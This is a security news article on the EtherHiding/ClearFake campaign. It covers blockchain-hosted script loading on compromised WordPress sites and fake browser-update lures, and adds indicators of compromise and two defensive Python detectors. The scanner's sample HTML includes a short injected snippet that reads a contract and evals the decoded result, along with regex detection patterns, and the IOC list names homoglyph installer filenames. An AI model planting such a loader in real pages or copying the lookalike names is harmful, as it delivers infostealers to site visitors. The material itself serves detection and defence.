Threat actors have adopted a new technique, named “EtherHiding,” that abuses Binance Smart Chain (BSC) contracts to host parts of a malicious code chain, hiding them inside the blockchain.
To distribute the malicious JavaScript that is loaded from the blockchain, threat actors used compromised WordPress sites that redirect to Cloudflare Worker hosts, which keeps the distribution evasive.
“In the attack flow, a site is defaced with a very believable overlay demanding a browser update before the site can be accessed. The fake ‘update’ turns out to be vicious infostealer malware like RedLine, Amadey, or Lumma,” reads the post by Guardio Labs.
EtherHiding Malware
This new technique has also been termed “ClearFake,” which distributes malicious codes through compromised websites by displaying fake browser update overlays.
According to the reports shared with Cyber Security News, it was confirmed that threat actors have been targeting vulnerable WordPress websites to inject two malicious scripts into the web pages.
These malicious scripts load the Binance Smart Chain (BSC) JS library, which fetches other malicious scripts from the blockchain that are injected into the site. Moreover, this code also triggers the download of the third-stage payload from the attacker-controlled server (C2).
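The chain described above (a script that loads a web3 client, reads a BSC contract, decodes the result, and executes it) leaves a recognisable footprint in page source. The following added example, not code from the article or from Guardio Labs, scans the scripts of a page for that combination. The sample HTML, the RPC endpoint, and the contract address are constructed placeholders, and the regular expressions are heuristics chosen for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not a real compromised site). Script 0 is an ordinary
# site script, script 1 loads a web3 client, script 2 is an inline injection of
# the kind the article describes: read a contract, decode the result, execute it.
# The endpoint (.invalid TLD) and the 0xabab... address are placeholders.
SAMPLE_HTML = """<html><head>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
</script>
<script src="https://cdn.example.test/web3.min.js"></script>
<script>
  const w3 = new Web3("https://bsc-rpc.invalid/");
  w3.eth.call({to: "0xabababababababababababababababababababab", data: "0xdeadbeef"})
     .then(r => eval(w3.utils.hexToAscii(r)));
</script>
</head><body></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page: its src attribute (if any) and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1]["body"] += data


# Heuristic indicators (chosen for this example). A script is flagged only when it
# both talks to a chain client AND executes dynamic code; the other two indicators
# add context to the finding.
INDICATORS = {
    "chain_client": re.compile(r"\bWeb3\b|ethers\.|JsonRpcProvider|eth_call|\.eth\.call\b", re.I),
    "contract_addr": re.compile(r"0x[0-9a-fA-F]{40}\b"),
    "decode": re.compile(r"hexToAscii|hexToUtf8|toUtf8String|\batob\s*\(", re.I),
    "dynamic_exec": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|createElement\s*\(\s*['\"]script", re.I
    ),
}


def classify_script(script):
    """Return the set of indicator names that match a script's src and body."""
    text = (script["src"] or "") + "\n" + script["body"]
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def scan_html(html):
    """Return one finding per script that reads from a chain and executes the result."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for index, script in enumerate(parser.scripts):
        hits = classify_script(script)
        if "chain_client" in hits and "dynamic_exec" in hits:
            findings.append({"index": index, "src": script["src"], "hits": sorted(hits)})
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(f"script #{finding['index']} flagged: {', '.join(finding['hits'])}")
```

Run it over exported page source or a crawler's fetch of each WordPress page; a legitimate dApp page will also call a chain client, so the requirement that the same script both reads from the chain and calls `eval`, `Function` or `document.write` is what keeps the rule narrow.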
[Figure: Compromised Website]
The fake browser update overlays are shown to Google Chrome, Microsoft Edge, or Mozilla Firefox users. When the victims click the “update” button, they are directed to download a malicious executable from Dropbox or other legitimate websites.
Blockchain technology, while being a powerful tool, can also be exploited in various ways, such as in the spread of malware or in the exfiltration of stolen data and files. These malicious activities can be difficult to track and shut down using traditional law enforcement methods.
A complete report about ClearFake has been published by Guardio Labs, providing detailed information about the distribution technique, exploitation methods, reason for Binance usage, and other information.
Indicators of Compromise (IOCs)

Related BSC Addresses/Contracts:
0xfc1fE66FB63c542A3e4D45305DaB196E5EcA222A
0x7f36D9292e7c70A204faCC2d255475A861487c60

3rd Stage IP Addresses:
109[.]248[.]206[.]49

3rd Stage Attacker Controlled Domains:
921hapudyqwdvy[.]com
98ygdjhdvuhj[.]com
boiibzqmk12j[.]com
bookchrono8273[.]com
bpjoieohzmhegwegmmuew[.]online
cczqyvuy812jdy[.]com
indogevro22tevra[.]com
ioiubby73b1n[.]com
kjniuby621edoo[.]com
lminoeubybyvq[.]com
nbvyrxry216vy[.]com
nmbvcxzasedrt[.]com
oekofkkfkoeefkefbnhgtrq[.]space
oiouhvtybh291[.]com
oiuugyfytvgb22h[.]com
oiuytyfvq621mb[.]org
ojhggnfbcy62[.]com
opkfijuifbuyynyny[.]com
pklkknj89bygvczvi[.]com
poqwjoemqzmemzgqegzqzf[.]online
pwwqkppwqkezqer[.]site
reedx51mut[.]com
sioaiuhsdguywqgyuhuiqw[.]org
ug62r67uiijo2[.]com
vcrwtttywuuidqioppn1[.]com
vvooowkdqddcqcqcdqggggl[.]site
ytntf5hvtn2vgcxxq[.]com
zasexdrc13ftvg[.]com
ziucsugcbfyfbyccbasy[.]com

Compromised WordPress Sites (Detected Last 14 Days):
kprofiles[.]com
animexin[.]vip
coloredmanga[.]com
gayvidsclub[.]com
dailyangelprayers[.]net
healthella[.]com
techsprobe[.]com
avionprivat[.]ro
...
510 More Domains Here –> https://pastebin.com/x23iWvix

Malware Hashes (samples):

Filename samples (Note UNICODE abuse in filenames):
ChrоmеSеtuр.appx
ChrоmеSеtuр.exe
СhrоmеSеtup.exe
ChrоmеSеtuр.msi
MlсrоsоftЕdgеSеtup.appx
MlсrоsоftЕdgеSеtup.exe
MlсrоsоftЕdgеSеtup.msi
MlсrоsоftЕdgеSеtup.msix
Setup_win64_2.49.0.4_release.exe
Setup_win64_5.49.1031-release.exe

Source: Guardio Labs
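The filename samples above look like “ChromeSetup.exe” and “MicrosoftEdgeSetup.msi” only because Cyrillic letters stand in for Latin ones, so a plain string match on the expected name misses them. The following added example, not code from the article or from Guardio Labs, flags filenames whose letters come from more than one Unicode script and maps the common Cyrillic lookalikes back to Latin so an analyst can see which legitimate name is being imitated. The sample names are constructed to mirror the listed ones, and the confusables table is a hand-picked subset, not a complete mapping.

```python
import unicodedata

# Constructed samples: the first two imitate the filenames in the IOC list
# (Cyrillic о, е, р, с, Е in place of Latin letters); the last two are clean.
SAMPLE_NAMES = [
    "Chr\u043em\u0435S\u0435tu\u0440.exe",                  # looks like ChromeSetup.exe
    "Ml\u0441r\u043es\u043eft\u0415dg\u0435S\u0435tup.msi",  # looks like MicrosoftEdgeSetup.msi
    "ChromeSetup.exe",
    "Setup_win64_2.49.0.4_release.exe",
]

# Hand-picked subset of Cyrillic letters that render like Latin ones (assumption:
# enough for the samples above; a production tool would use the full Unicode
# confusables data).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X",
}


def scripts_in(name):
    """Return the set of scripts used by the letters in name, taken from the
    first word of each character's Unicode name ("LATIN", "CYRILLIC", ...)."""
    found = set()
    for ch in name:
        if not ch.isalpha():
            continue  # digits, dots and underscores carry no script
        found.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return found


def is_mixed_script(name):
    """A filename whose letters come from more than one script is suspicious."""
    return len(scripts_in(name)) > 1


def skeleton(name):
    """Replace known Cyrillic lookalikes with the Latin letter they imitate."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in name)


def triage(names):
    """Return (original, lookalike) pairs for every mixed-script filename."""
    return [(n, skeleton(n)) for n in names if is_mixed_script(n)]


if __name__ == "__main__":
    for original, lookalike in triage(SAMPLE_NAMES):
        print(f"{original!r} -> imitates {lookalike!r} (scripts: {sorted(scripts_in(original))})")
```

The same check applies to download logs and EDR file-creation events: compare the skeleton against the expected installer name, and treat any mixed-script name that collapses to a known product installer as a detection rather than a typo.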